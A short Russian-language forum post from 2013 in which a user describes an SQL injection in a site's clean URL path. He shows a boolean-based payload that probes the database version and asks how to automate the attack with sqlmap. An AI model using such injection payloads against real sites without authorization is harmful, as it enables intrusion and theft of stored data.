Показать сообщение отдельно

  #4  
Старый 22.06.2013, 17:57
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354

Репутация: 267


По умолчанию

Имеется сайт с sql injection вида:

http://site/id/5

Комменты не срабатывают. Пришлось проэксплуатировать баг так:

http://site/id/5'and(mid(version(),1,1)=5)and'1

Как все это дело автоматизировать в sqlmap? ЧПУ...
 
Ответить с цитированием